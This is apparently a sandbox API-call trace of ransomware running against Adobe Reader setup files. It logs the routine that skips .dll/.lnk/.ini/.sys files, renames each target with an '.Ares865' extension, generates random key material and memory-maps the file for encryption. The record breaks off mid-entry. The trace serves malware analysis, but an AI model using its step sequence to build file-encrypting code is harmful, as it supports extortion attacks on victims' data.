[0154.567] lstrlenW (lpString="1036.mst") returned 8 [0154.567] lstrlenW (lpString="Ares865") returned 7 [0154.567] lstrcmpiW (lpString1="036.mst", lpString2="Ares865") returned -1 [0154.567] lstrlenW (lpString=".dll") returned 4 [0154.567] lstrcmpiW (lpString1="1036.mst", lpString2=".dll") returned 1 [0154.567] lstrlenW (lpString=".lnk") returned 4 [0154.567] lstrcmpiW (lpString1="1036.mst", lpString2=".lnk") returned 1 [0154.567] lstrlenW (lpString=".ini") returned 4 [0154.567] lstrcmpiW (lpString1="1036.mst", lpString2=".ini") returned 1 [0154.567] lstrlenW (lpString=".sys") returned 4 [0154.567] lstrcmpiW (lpString1="1036.mst", lpString2=".sys") returned 1 [0154.567] lstrlenW (lpString="1036.mst") returned 8 [0154.567] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1036.mst.Ares865") returned 108 [0154.567] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1036.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1036.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1036.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1036.mst.ares865"), dwFlags=0x1) returned 1 [0154.569] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1036.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1036.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.569] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51200) returned 1 [0154.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.570] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.570] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.570] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.570] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcb00, lpName=0x0) returned 0x170 [0154.572] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcb00) returned 0x190000 [0154.575] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.575] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.575] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.577] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1038.mst" | out: lpString1="1038.mst") returned="1038.mst" [0154.577] lstrlenW (lpString="1038.mst") returned 8 [0154.577] lstrlenW (lpString="Ares865") returned 7 [0154.577] lstrcmpiW (lpString1="038.mst", lpString2="Ares865") returned -1 [0154.577] lstrlenW (lpString=".dll") returned 4 [0154.577] lstrcmpiW (lpString1="1038.mst", lpString2=".dll") returned 1 [0154.577] lstrlenW (lpString=".lnk") returned 4 [0154.577] lstrcmpiW (lpString1="1038.mst", lpString2=".lnk") returned 1 [0154.577] lstrlenW (lpString=".ini") returned 4 [0154.577] lstrcmpiW (lpString1="1038.mst", lpString2=".ini") returned 1 [0154.577] lstrlenW (lpString=".sys") returned 4 [0154.577] lstrcmpiW (lpString1="1038.mst", lpString2=".sys") returned 1 [0154.577] lstrlenW (lpString="1038.mst") returned 8 [0154.577] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1038.mst.Ares865") returned 108 [0154.577] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1038.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1038.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1038.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1038.mst.ares865"), dwFlags=0x1) returned 1 [0154.579] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1038.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1038.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.579] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40448) returned 1 [0154.579] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.579] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.580] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.580] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.580] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.580] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa100, lpName=0x0) returned 0x170 [0154.582] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa100) returned 0x190000 [0154.584] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.585] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.585] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.585] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.586] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1040.mst" | out: lpString1="1040.mst") returned="1040.mst" [0154.586] lstrlenW (lpString="1040.mst") returned 8 [0154.586] lstrlenW (lpString="Ares865") returned 7 [0154.586] lstrcmpiW (lpString1="040.mst", lpString2="Ares865") returned -1 [0154.586] lstrlenW (lpString=".dll") returned 4 [0154.586] lstrcmpiW (lpString1="1040.mst", lpString2=".dll") returned 1 [0154.586] lstrlenW (lpString=".lnk") returned 4 [0154.586] lstrcmpiW (lpString1="1040.mst", lpString2=".lnk") returned 1 [0154.586] lstrlenW (lpString=".ini") returned 4 [0154.586] lstrcmpiW (lpString1="1040.mst", lpString2=".ini") returned 1 [0154.586] lstrlenW (lpString=".sys") returned 4 [0154.586] lstrcmpiW (lpString1="1040.mst", lpString2=".sys") returned 1 [0154.586] lstrlenW (lpString="1040.mst") returned 8 [0154.587] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1040.mst.Ares865") returned 108 [0154.587] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1040.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1040.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1040.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1040.mst.ares865"), dwFlags=0x1) returned 1 [0154.588] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1040.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1040.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=52224) returned 1 [0154.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.589] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.589] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.589] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.589] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.590] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcf00, lpName=0x0) returned 0x170 [0154.591] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcf00) returned 0x190000 [0154.633] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.634] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.634] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.635] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1041.mst" | out: lpString1="1041.mst") returned="1041.mst" [0154.635] lstrlenW (lpString="1041.mst") returned 8 [0154.635] lstrlenW (lpString="Ares865") returned 7 [0154.635] lstrcmpiW (lpString1="041.mst", lpString2="Ares865") returned -1 [0154.635] lstrlenW (lpString=".dll") returned 4 [0154.635] lstrcmpiW (lpString1="1041.mst", lpString2=".dll") returned 1 [0154.635] lstrlenW (lpString=".lnk") returned 4 [0154.636] lstrcmpiW (lpString1="1041.mst", lpString2=".lnk") returned 1 [0154.636] lstrlenW (lpString=".ini") returned 4 [0154.636] lstrcmpiW (lpString1="1041.mst", lpString2=".ini") returned 1 [0154.636] lstrlenW (lpString=".sys") returned 4 [0154.636] lstrcmpiW (lpString1="1041.mst", lpString2=".sys") returned 1 [0154.636] lstrlenW (lpString="1041.mst") returned 8 [0154.636] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1041.mst.Ares865") returned 108 [0154.636] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1041.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1041.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1041.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1041.mst.ares865"), dwFlags=0x1) returned 1 [0154.639] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1041.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1041.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.639] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=47616) returned 1 [0154.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.639] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.640] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.640] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.640] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbd00, lpName=0x0) returned 0x170 [0154.642] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbd00) returned 0x190000 [0154.645] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.645] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.645] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.647] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1042.mst" | out: lpString1="1042.mst") returned="1042.mst" [0154.647] lstrlenW (lpString="1042.mst") returned 8 [0154.647] lstrlenW (lpString="Ares865") returned 7 [0154.647] lstrcmpiW (lpString1="042.mst", lpString2="Ares865") returned -1 [0154.647] lstrlenW (lpString=".dll") returned 4 [0154.647] lstrcmpiW (lpString1="1042.mst", lpString2=".dll") returned 1 [0154.647] lstrlenW (lpString=".lnk") returned 4 [0154.647] lstrcmpiW (lpString1="1042.mst", lpString2=".lnk") returned 1 [0154.647] lstrlenW (lpString=".ini") returned 4 [0154.647] lstrcmpiW (lpString1="1042.mst", lpString2=".ini") returned 1 [0154.647] lstrlenW (lpString=".sys") returned 4 [0154.647] lstrcmpiW (lpString1="1042.mst", lpString2=".sys") returned 1 [0154.647] lstrlenW (lpString="1042.mst") returned 8 [0154.647] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1042.mst.Ares865") returned 108 [0154.647] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1042.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1042.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1042.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1042.mst.ares865"), dwFlags=0x1) returned 1 [0154.650] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1042.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1042.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.650] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44544) returned 1 [0154.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.650] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.650] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.651] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.651] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.651] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb100, lpName=0x0) returned 0x170 [0154.653] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb100) returned 0x190000 [0154.656] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.657] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.657] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.657] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.658] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1043.mst" | out: lpString1="1043.mst") returned="1043.mst" [0154.658] lstrlenW (lpString="1043.mst") returned 8 [0154.658] lstrlenW (lpString="Ares865") returned 7 [0154.658] lstrcmpiW (lpString1="043.mst", lpString2="Ares865") returned -1 [0154.658] lstrlenW (lpString=".dll") returned 4 [0154.658] lstrcmpiW (lpString1="1043.mst", lpString2=".dll") returned 1 [0154.658] lstrlenW (lpString=".lnk") returned 4 [0154.658] lstrcmpiW (lpString1="1043.mst", lpString2=".lnk") returned 1 [0154.658] lstrlenW (lpString=".ini") returned 4 [0154.658] lstrcmpiW (lpString1="1043.mst", lpString2=".ini") returned 1 [0154.658] lstrlenW (lpString=".sys") returned 4 [0154.659] lstrcmpiW (lpString1="1043.mst", lpString2=".sys") returned 1 [0154.659] lstrlenW (lpString="1043.mst") returned 8 [0154.659] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1043.mst.Ares865") returned 108 [0154.659] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1043.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1043.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1043.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1043.mst.ares865"), dwFlags=0x1) returned 1 [0154.661] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1043.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1043.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.661] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51200) returned 1 [0154.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.662] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.662] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.662] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.663] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcb00, lpName=0x0) returned 0x170 [0154.664] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcb00) returned 0x190000 [0154.667] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.668] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.668] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.669] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1044.mst" | out: lpString1="1044.mst") returned="1044.mst" [0154.669] lstrlenW (lpString="1044.mst") returned 8 [0154.669] lstrlenW (lpString="Ares865") returned 7 [0154.669] lstrcmpiW (lpString1="044.mst", lpString2="Ares865") returned -1 [0154.669] lstrlenW (lpString=".dll") returned 4 [0154.670] lstrcmpiW (lpString1="1044.mst", lpString2=".dll") returned 1 [0154.670] lstrlenW (lpString=".lnk") returned 4 [0154.670] lstrcmpiW (lpString1="1044.mst", lpString2=".lnk") returned 1 [0154.670] lstrlenW (lpString=".ini") returned 4 [0154.670] lstrcmpiW (lpString1="1044.mst", lpString2=".ini") returned 1 [0154.670] lstrlenW (lpString=".sys") returned 4 [0154.670] lstrcmpiW (lpString1="1044.mst", lpString2=".sys") returned 1 [0154.670] lstrlenW (lpString="1044.mst") returned 8 [0154.670] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1044.mst.Ares865") returned 108 [0154.670] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1044.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1044.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1044.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1044.mst.ares865"), dwFlags=0x1) returned 1 [0154.672] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1044.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1044.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.672] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46080) returned 1 [0154.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.672] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.673] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.673] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.673] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb700, lpName=0x0) returned 0x170 [0154.674] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb700) returned 0x190000 [0154.677] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.678] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.678] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.679] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1045.mst" | out: lpString1="1045.mst") returned="1045.mst" [0154.679] lstrlenW (lpString="1045.mst") returned 8 [0154.679] lstrlenW (lpString="Ares865") returned 7 [0154.679] lstrcmpiW (lpString1="045.mst", lpString2="Ares865") returned -1 [0154.679] lstrlenW (lpString=".dll") 